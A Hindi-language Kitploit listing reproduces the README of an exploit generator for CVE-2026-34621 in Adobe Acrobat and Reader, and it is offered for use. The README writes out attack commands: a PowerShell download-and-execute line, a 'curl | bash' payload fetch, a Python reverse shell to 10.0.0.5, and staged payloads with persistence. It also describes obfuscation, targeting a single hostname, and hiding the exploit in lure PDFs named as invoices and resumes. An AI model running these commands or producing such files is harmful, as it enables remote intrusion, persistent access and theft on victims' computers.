Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve_2026_34621_advanced — CVE-2026-34621 के लिए एक परिष्कृत, क्रॉस-प्लेटफ़ॉर्म एक्सप्लॉइट जनरेटर – Adobe Acrobat और Reader में एक गंभीर प्रोटोटाइप प्रदूषण भेद्यता, जो Windows और macOS पर सैंडबॉक्स एस्केप और मनमाना कोड निष्पादन की ओर ले जाती है। | Kitploit
उपकरण/GitHubGitHub/null200ok/cve_2026_34621_advanced
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubnull200ok/cve_2026_34621_advanced

cve_2026_34621_advanced

CVE-2026-34621 के लिए एक परिष्कृत, क्रॉस-प्लेटफ़ॉर्म एक्सप्लॉइट जनरेटर – Adobe Acrobat और Reader में एक गंभीर प्रोटोटाइप प्रदूषण भेद्यता, जो Windows और macOS पर सैंडबॉक्स एस्केप और मनमाना कोड निष्पादन की ओर ले जाती है।

रिपॉजिटरी देखें
136125 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-34621 उन्नत एक्सप्लॉइट जनरेटर

Python 3.7+ License

CVE-2026-34621 के लिए एक परिष्कृत, क्रॉस-प्लेटफ़ॉर्म एक्सप्लॉइट जनरेटर – Adobe Acrobat और Reader में एक गंभीर प्रोटोटाइप प्रदूषण भेद्यता जो Windows और macOS पर सैंडबॉक्स एस्केप और मनमाना कोड निष्पादन की ओर ले जाती है।

⚠️ महत्वपूर्ण अस्वीकरण
यह टूल केवल अधिकृत सुरक्षा अनुसंधान और पैठ परीक्षण के लिए है।
उन सिस्टमों के विरुद्ध अनधिकृत उपयोग जिनके आप स्वामी नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति नहीं है, अवैध है। लेखक दुरुपयोग के लिए कोई दायित्व नहीं मानता है।


📋 विषय-सूची

  • अवलोकन
  • विशेषताएँ
  • स्थापना
  • त्वरित प्रारंभ
  • उपयोग उदाहरण
    • Windows कमांड
    • macOS कमांड
    • मोबाइल परीक्षण
  • कमांड-लाइन विकल्प
  • यह कैसे काम करता है
  • प्रभावित संस्करण
  • शमन
  • योगदान
  • लाइसेंस

🔍 अवलोकन

CVE-2026-34621 Adobe Acrobat और Reader में एक ज़ीरो-डे भेद्यता है जो हमलावर को अनुमति देती है:

  1. Adobe के इंजन के भीतर JavaScript ऑब्जेक्ट प्रोटोटाइप को प्रदूषित करना।
  2. सुरक्षा सैंडबॉक्स को बायपास करना।
  3. पीड़ित की मशीन पर मनमाना सिस्टम कमांड निष्पादित करना।

यह जनरेटर एक दुर्भावनापूर्ण PDF फ़ाइल बनाता है जो, Adobe Reader के भेद्य संस्करण में खोले जाने पर, पीड़ित के ऑपरेटिंग सिस्टम के अनुरूप पेलोड को स्वचालित रूप से निष्पादित करता है।

समर्थित लक्ष्य प्लेटफ़ॉर्म:

  • ✅ Windows (पूर्ण मनमाना कोड निष्पादन)
  • ✅ macOS (पूर्ण मनमाना कोड निष्पादन)
  • ❌ Android / iOS (भेद्य नहीं – केवल डेमो फ़ॉलबैक)

✨ विशेषताएँ

श्रेणीक्षमताएँ
क्रॉस‑प्लेटफ़ॉर्म पेलोडOS का स्वतः पता लगाता है और उपयुक्त Windows या macOS कमांड निष्पादन विधि का चयन करता है।
एकाधिक निष्पादन वेक्टरcmd.exe, PowerShell, WScript.Shell (Windows) / Terminal.app, osascript (macOS)।
स्टेज्ड पेलोडदूरस्थ URL से द्वितीय-चरण पेलोड डाउनलोड और निष्पादित करें।
स्थिरतारजिस्ट्री Run कुंजी (Windows) या LaunchAgent (macOS) स्थापित करें।
चोरी तकनीकJavaScript अस्पष्टता के तीन स्तर, पर्यावरण कुंजीकरण, निष्पादन विलंब, बहुरूपी कोड।
ल्यूर PDF एम्बेडिंगएक्सप्लॉइट को वैध दिखने वाली PDF में विलय करें (PyPDF2 आवश्यक है)।
एकाधिक ट्रिगरOpenAction, पेज-ओपन एक्शन, या दस्तावेज़-स्तरीय JavaScript।
व्यापक रिपोर्टिंगपेलोड कॉन्फ़िगरेशन का विवरण देने वाली HTML, TXT, और JSON रिपोर्ट।

📦 स्थापना

1. रिपॉजिटरी क्लोन करें

git clone https://github.com/NULL200OK/CVE-2026-34621-Exploit.git
cd CVE-2026-34621-Exploit

2. (वैकल्पिक) वर्चुअल एनवायरनमेंट बनाएं

python3 -m venv venv
source venv/bin/activate      # Linux/macOS
venv\Scripts\activate         # Windows

3. निर्भरताएँ स्थापित करें

मुख्य स्क्रिप्ट केवल Python मानक लाइब्रेरी का उपयोग करती है। ल्यूर PDF विलय सुविधा के लिए, PyPDF2 स्थापित करें:

pip install PyPDF2

🚀 त्वरित प्रारंभ

Windows और macOS दोनों पर कैलकुलेटर खोलने वाली एक बुनियादी PDF उत्पन्न करें:

python3 cve_2026_34621_advanced.py -o test.pdf

यह बनाता है:

test.pdf – दुर्भावनापूर्ण PDF फ़ाइल।

test_report.html – विस्तृत HTML रिपोर्ट।

test_report.txt – सादा पाठ सारांश।

test_config.json – JSON कॉन्फ़िगरेशन निर्यात।

💻 उपयोग उदाहरण

Windows कमांड

1-परिदृश्य कमांड

A-बेसिक calc.exe पॉपअप

python cve_2026_34621_advanced.py -o invoice.pdf --win calc.exe

PowerShell रिवर्स शेल

python cve_2026_34621_advanced.py -o contract.pdf --win "powershell -NoP -Ep Bypass -C \"IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.5/shell.ps1')\""

स्थिरता के साथ स्टेज्ड पेलोड

python cve_2026_34621_advanced.py -o resume.pdf --win calc.exe --stage http://192.168.1.100/payload.exe -p

पर्यावरण‑कुंजीकृत (केवल "SALES-PC" पर चलाएं)

python cve_2026_34621_advanced.py -o targeted.pdf --win calc.exe -k SALES-PC

अस्पष्टता स्तर 2 और 10‑सेकंड विलंब के साथ

python cve_2026_34621_advanced.py -o delayed.pdf --win calc.exe -O 2 -d 10

macOS कमांड

2-परिदृश्य कमांड

कैलकुलेटर खोलें

python cve_2026_34621_advanced.py -o invoice.pdf --mac "open /System/Applications/Calculator.app"

स्क्रिप्ट डाउनलोड और निष्पादित करें

python cve_2026_34621_advanced.py -o update.pdf --mac "curl -s http://10.0.0.5/mac_payload.sh | bash"

Python के माध्यम से रिवर्स शेल

python cve_2026_34621_advanced.py -o shell.pdf --mac "python -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"10.0.0.5\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"

LaunchAgent के माध्यम से स्थिरता

python cve_2026_34621_advanced.py -o persist.pdf --mac "open /Applications/Calculator.app" -p

ल्यूर PDF में एम्बेड करना

python cve_2026_34621_advanced.py -o safe_invoice.pdf -l /path/to/real_invoice.pdf --trigger pageopen

3-मोबाइल परीक्षण नोट

स्क्रिप्ट स्वयं PDF उत्पन्न करने के लिए डेस्कटॉप (Windows/macOS/Linux) पर चलती है। उत्पन्न PDF को Android या iOS डिवाइस पर खोला जा सकता है, लेकिन:

Adobe Acrobat Reader के मोबाइल संस्करण CVE-2026-34621 के लिए भेद्य नहीं हैं।

पेलोड सिस्टम कमांड निष्पादित करने के बजाय एक हानिरहित डेमो फ़ॉलबैक (URL खोलना या अलर्ट दिखाना) ट्रिगर करेगा।

📖 कमांड-लाइन विकल्प

विकल्प विवरण

-o, --output FILE आवश्यक। आउटपुट PDF फ़ाइलनाम।

--win CMD निष्पादित करने के लिए Windows कमांड (डिफ़ॉल्ट: calc.exe)।

--mac CMD निष्पादित करने के लिए macOS कमांड (डिफ़ॉल्ट: open /System/Applications/Calculator.app)।

--stage URL द्वितीय-चरण पेलोड डाउनलोड करने के लिए URL।

-p, --persistence स्थिरता तंत्र स्थापित करें (Registry/LanchAgent)।

-O, --obfuscate LEVEL JavaScript अस्पष्टता स्तर (0=कोई नहीं, 1=बुनियादी, 2=मध्यवर्ती, 3=उन्नत)।

-d, --delay SECONDS निष्पादन को निर्दिष्ट सेकंड के लिए विलंबित करें।

-k, --key HOSTNAME पर्यावरण कुंजीकरण – केवल मेल खाने वाले होस्टनाम पर निष्पादित करें।

-l, --lure PDF ल्यूर के रूप में उपयोग करने के लिए वैध PDF का पथ (एक्सप्लॉइट को विलय करता है)।

--trigger TYPE ट्रिगर वेक्टर: openaction, pageopen, या doclevel।

--no-reports HTML/TXT/JSON रिपोर्ट उत्पन्न करना छोड़ें।

--seed N प्रतिलिपि योग्य बहुरूपी पीढ़ी के लिए यादृच्छिक बीज सेट करें।

⚙️ यह कैसे काम करता है

हमला श्रृंखला

प्रोटोटाइप प्रदूषण:

एम्बेडेड JavaScript दुर्भावनापूर्ण गुण (__trusted, privileged, आदि) इंजेक्ट करने के लिए Object.prototype को संशोधित करता है। यह Adobe के JavaScript इंजन ट्रस्ट सीमा को भ्रमित करता है।

संदर्भ वृद्धि

प्रदूषित प्रोटोटाइप के कारण, इंजन अविश्वसनीय दस्तावेज़ JavaScript को गलत तरीके से विशेषाधिकार प्राप्त संदर्भ में चल रहा मानता है।

विशेषाधिकार प्राप्त API पहुंच

स्क्रिप्ट अब app.launchURL, util.readFileIntoStream, और app.trustedFunction जैसे प्रतिबंधित API को कॉल कर सकती है।

सैंडबॉक्स एस्केप

ये API Adobe सैंडबॉक्स के बाहर फ़ाइल सिस्टम पहुंच और प्रक्रिया निष्पादन की अनुमति देते हैं।

मनमाना कोड निष्पादन

स्क्रिप्ट OS-विशिष्ट विधियों का उपयोग करके हमलावर के कमांड को निष्पादित करती है:

Windows: cmd.exe /c, PowerShell, या WScript.Shell।

macOS: Terminal.app URL हैंडलर या osascript।

अस्पष्टता स्तर

स्तर विवरण

0 कोई अस्पष्टता नहीं – सादा पठनीय JavaScript।

1 स्ट्रिंग शाब्दिक String.fromCharCode में परिवर्तित, चर नाम यादृच्छिक।

2 स्तर 1 + डेड कोड इंजेक्शन और जंक टिप्पणियाँ।

3 पूरी स्क्रिप्ट base64-एन्कोडेड और eval(atob(...)) में लपेटी गई, फिर पुनः अस्पष्ट।

🛡️ प्रभावित संस्करण

उत्पाद ट्रैक भेद्य संस्करण पैच किया गया संस्करण

Adobe Acrobat DC निरंतर ≤ 26.001.21367 26.001.21411

Adobe Acrobat Reader DC निरंतर ≤ 26.001.21367 26.001.21411

टूल डाउनलोड करें